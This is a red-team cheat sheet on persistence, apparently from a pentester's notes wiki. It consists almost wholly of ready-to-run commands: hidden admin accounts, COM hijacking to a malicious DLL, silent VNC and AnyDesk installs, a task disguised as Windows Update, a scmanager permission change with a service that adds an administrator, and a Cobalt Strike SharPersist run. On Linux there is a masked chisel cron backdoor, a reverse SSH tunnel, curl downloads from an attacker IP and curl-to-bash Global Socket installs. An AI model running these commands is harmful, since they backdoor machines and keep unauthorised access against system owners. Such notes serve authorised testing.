Persistence

Last updated 1 month ago

Persistence

Windows

Scheduled Tasks

Hidden Local User

Dollar Sign

Cmd > net1.exe user snovvcrash$ Passw0rd! /add

SpecialAccounts

PS > New-Item -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name SpecialAccounts
PS > New-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\" -Name snovvcrash -PropertyType DWORD -Value 0 -Force

Suborner

PS > whoami
nt authority\system
PS > .\Suborner.exe /username:snovvcrash$ /password:Passw0rd!

COM Hijacking

Locate good targets to hijack with Procmon filters:

Operation is RegOpenKey
Result is NAME NOT FOUND
Path is InprocServer32 (in-process server allowing the specified DLL to be loaded into current process memory space)

Locate CLSIDs from scheduled tasks:

schtask.ps1

$Tasks = Get-ScheduledTask

foreach ($Task in $Tasks)
{
  if ($Task.Actions.ClassId -ne $null)
  {
    if ($Task.Triggers.Enabled -eq $true)
    {
      if ($Task.Principal.GroupId -eq "Users")
      {
        Write-Host "Task Name: " $Task.TaskName
        Write-Host "Task Path: " $Task.TaskPath
        Write-Host "CLSID: " $Task.Actions.ClassId
        Write-Host
      }
    }
  }
}

Check if a COM component exists under a relevant registry hive by its CLSID:

PS > Get-ChildItem -Path "Registry::HKCR\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}"
PS > Get-Item -Path "HKLM:Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}" | ft -AutoSize
PS > Get-Item -Path "HKCU:Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}" | ft -AutoSize

If it exists under HKLM but does not exists under HKCU hive, we can hijack this COM component by creating a new item in the latter path:

PS > New-Item -Path "HKCU:Software\Classes\CLSID" -Name "{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}"
PS > New-Item -Path "HKCU:Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}" -Name "InprocServer32" -Value "C:\Windows\Tasks\evil.dll"
PS > New-ItemProperty -Path "HKCU:Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}\InprocServer32" -Name "ThreadingModel" -Value "Both"
PS > Get-ItemProperty -Path "HKCU:Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}\InprocServer32"

RID Hijacking

.LNK Shortcuts

VNC

TigerVNC (WinVNC)

TightVNC

Download and unpack MSI:

curl https://www.tightvnc.com/download/2.8.85/tightvnc-2.8.85-gpl-setup-64bit.msi -o tightvnc.msi
msiexec /qb /a tightvnc.msi TARGETDIR=%cd%\TightVNC
move TightVNC\PFiles\TightVNC\tvnserver.exe .
move TightVNC\PFiles\TightVNC\screenhooks32.dll .
rmdir TightVNC /s /q
del tightvnc.msi

Create a password (8 chars):

printf "PASSWOR\0" | openssl enc -des-cbc --nopad --nosalt -K 0123456789abcdef -iv 0000000000000000 -provider legacy -provider default | xxd -p
f408495e54374919

wget http://ftp.de.debian.org/debian/pool/main/v/vinagre/vinagre_3.22.0-8.1_amd64.deb
sudo apt install ./vinagre_3.22.0-8.1_amd64.deb && rm vinagre_3.22.0-8.1_amd64.deb

Install TightVNC server:

New-Item -Path "HKLM:\Software\TightVNC" -Force > $null
New-Item -Path "HKLM:\Software\TightVNC\Server" -Force > $null

Set-ItemProperty -Path "HKLM:\Software\TightVNC\Server" -Name "Password" -Value ([byte[]](0xf4,0x08,0x49,0x5e,0x54,0x37,0x49,0x19)) -Type Binary -Force
Set-ItemProperty -Path "HKLM:\Software\TightVNC\Server" -Name "RfbPort" -Value 31337 -Type DWord -Force
Set-ItemProperty -Path "HKLM:\Software\TightVNC\Server" -Name "RunControlInterface" -Value 0 -Type DWord -Force
Set-ItemProperty -Path "HKLM:\Software\TightVNC\Server" -Name "RemoveWallpaper" -Value 0 -Type DWord -Force
Set-ItemProperty -Path "HKLM:\Software\TightVNC\Server" -Name "AcceptHttpConnections" -Value 0 -Type DWord -Force
Set-ItemProperty -Path "HKLM:\Software\TightVNC\Server" -Name "LoopbackOnly" -Value 0 -Type DWord -Force
Set-ItemProperty -Path "HKLM:\Software\TightVNC\Server" -Name "AllowLoopback" -Value 1 -Type DWord -Force
Set-ItemProperty -Path "HKLM:\Software\TightVNC\Server" -Name "RunAsService" -Value 1 -Type DWord -Force
Set-ItemProperty -Path "HKLM:\Software\TightVNC\Server" -Name "ServiceDisplayName" -Value "TightVNC Server" -Type String -Force
Set-ItemProperty -Path "HKLM:\Software\TightVNC\Server" -Name "UseVncAuthentication" -Value 1 -Type DWord -Force
Set-ItemProperty -Path "HKLM:\Software\TightVNC\Server" -Name "UseControlAuthentication" -Value 1 -Type DWord -Force
Set-ItemProperty -Path "HKLM:\Software\TightVNC\Server" -Name "QueryAcceptOnTimeout" -Value 1 -Type DWord -Force
Set-ItemProperty -Path "HKLM:\Software\TightVNC\Server" -Name "QueryTimeout" -Value 10 -Type DWord -Force

# cd C:\path\to\tvnserver_exe\and\screenhooks32_dll
Start-Process -FilePath .\tvnserver.exe -ArgumentList "-install -silent" -NoNewWindow -Wait
Start-Service -Name "TightVNC Server"
Get-Service "TightVNC Server"

Uninstall TightVNC server:

# cd C:\path\to\tvnserver_exe\and\screenhooks32_dll
Start-Process -FilePath .\tvnserver.exe -ArgumentList "-remove -silent" -NoNewWindow -Wait
Get-Service "TightVNC Server"
Remove-Item -Path "HKLM:\Software\TightVNC" -Recurse -Force
Stop-Process -Name tvnserver -Force
rm tvnserver.exe, screenhooks32.dll

AnyDesk

Cmd > bitsadmin /transfer job1 https://download.anydesk.com/AnyDesk-CM.exe C:\Users\snovvcrash\AppData\Local\Temp\anydesk.exe
Cmd > C:\Users\snovvcrash\AppData\Local\Temp\anydesk.exe --install C:\Users\snovvcrash\AppData\Local\AnyDesk --start-with-win --silent
Cmd > del C:\Users\snovvcrash\AppData\Local\Temp\anydesk.exe
Cmd > echo Passw0rd! | C:\Users\snovvcrash\AppData\Local\AnyDesk\AnyDesk.exe --set-password
Cmd > cmd /c "for /f ""delims="" %i in ('C:\Users\snovvcrash\AppData\Local\AnyDesk\AnyDesk.exe --get-id') do echo %i"
Cmd > C:\Users\snovvcrash\AppData\Local\AnyDesk\AnyDesk.exe --remove

Keep Awake

Disable sleep when plugged in / on battery:

Cmd > powercfg /change standby-timeout-ac 0
Cmd > powercfg /change standby-timeout-dc 0

Disable hibernate when plugged in / on battery:

Cmd > powercfg /change hibernate-timeout-ac 0
Cmd > powercfg /change hibernate-timeout-dc 0

Disable sleep when closing laptop lid (plugged in / on battery):

Cmd > powercfg -setacvalueindex SCHEME_CURRENT SUB_BUTTONS LIDACTION 0
Cmd > powercfg -setdcvalueindex SCHEME_CURRENT SUB_BUTTONS LIDACTION 0

Apply all settings:

Cmd > powercfg -SetActive SCHEME_CURRENT

Create a scheduled task to wake up:

PS > schtasks /create /tn "Microsoft\Windows\WindowsUpdate\Refresh Group Policy" /tr "cmd.exe /c exit" /sc daily /st 23:00:00 /ru "SYSTEM" /f
PS > Get-ScheduledTask -TaskName "Refresh Group Policy"
PS > $settings = New-ScheduledTaskSettingsSet -WakeToRun
PS > Set-ScheduledTask -TaskName "Refresh Group Policy" -TaskPath "Microsoft\Windows\WindowsUpdate\" -Settings $settings
PS > powercfg /waketimers

SDDL Manipulation

Backup current SDDL for scmanager:

Cmd > sc.exe sdshow scmanager

Change it to allow everyone to create a service:

Cmd > sc.exe sdset scmanager D:(A;;KA;;;WD)

Create a service that will auto run at next reboot:

Cmd > sc.exe create lpesvc displayName= "lpesvc" binPath= "C:\Windows\System32\net.exe localgroup administrators snovvcrash /add" obj= LocalSystem start= auto

Check if scmanager SDDL has been modified:

PS > ConvertFrom-SddlString -Sddl $(sc.exe sdshow scmanager | select -Last 1) | select -Expand DiscretionaryAcl

Tools

SharPersist

beacon> execute-assembly SharPersist.exe -t schtask -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc <BASE64_CMD>" -n "Updater" -m add -o hourly
beacon> execute-assembly SharPersist.exe -t startupfolder -f "UserEnvSetup" -m add
beacon> execute-assembly SharPersist.exe -t reg -c "C:\ProgramData\Updater.exe" -a "/q /n" -k "hkcurun" -v "Updater" -m add

Linux

Cron

Quicky crontab without duplicating backdoor process if already running:

$ echo 'if [ -z "$(pwdx $(pgrep chisel) 2>/dev/null | grep home)" ]; then $(cd /home/user/.local/lib; export PATH=.:$PATH; exec -a "kworker/0:2-events" chisel & disown); fi' > /home/user/.local/.1
$ (crontab -l; echo '* * * * * /home/user/.local/.1') | crontab -

SSH

Add a temporary rule allowing connections from your IP:

$ sudo iptables -A INPUT -p tcp -s 10.10.13.37 --dport 22 -j ACCEPT

SSH Tunnel in Crontab

callback.sh

#!/bin/bash
if [[ `ps -ef | grep -c 2222` -eq 1 ]]; then
  /usr/bin/ssh -nNT -R 2222:localhost:22 [-oPubkeyAcceptedKeyTypes=+ssh-rsa -oHostKeyAlgorithms=+ssh-rsa] [-oServerAliveInterval=300 -oServerAliveCountMax=3] -oStrictHostKeyChecking=no -oUserKnownHostsFile=/dev/null -oIdentitiesOnly=yes -i /home/alice/.ssh/.k nopty@10.10.13.37
fi

Attacker's box:

$ sudo -i
# useradd -ms /bin/false nopty
# mkdir /home/nopty/.ssh
# ssh-keygen -f /home/nopty/.ssh/dummy_key -t ed25519 -q -N ""
# cat /home/nopty/.ssh/dummy_key.pub
# echo 'from="10.10.13.38",command="echo Only port forwarding is allowed",no-agent-forwarding,no-X11-forwarding,no-pty '`cat /home/nopty/.ssh/dummy_key.pub` > /home/nopty/.ssh/authorized_keys
# chown -R nopty:nopty .ssh

Victim's box:

$ curl 10.10.13.37/dummy_key > /home/alice/.ssh/.k
$ chmod 600 /home/alice/.ssh/.k
$ curl 10.10.13.37/callback.sh > /home/alice/.conf
$ chmod +x /home/alice/.conf
$ crontab -e
*/15 * * * * /home/alice/.conf

Global Socket

Install

Victim's box:

$ bash -c "$(curl -fsSL gsocket.io/x)"
$ bash -c "$(wget -qO- gsocket.io/x)"

Connect

Attacker's box:

$ cd ~/tools && bash -c "$(curl -fsSL https://tiny.cc/gsinst)" && cd
$ ~/tools/gsocket/tools/gs-netcat -s "<SECRET>" -i

Clean Up

Victim's box:

$ GS_UNDO=1 bash -c "$(curl -fsSL gsocket.io/x)"
$ GS_UNDO=1 bash -c "$(wget -qO- gsocket.io/x)"

$ pkill gs-bd

Rootkits

Last updated 1 month ago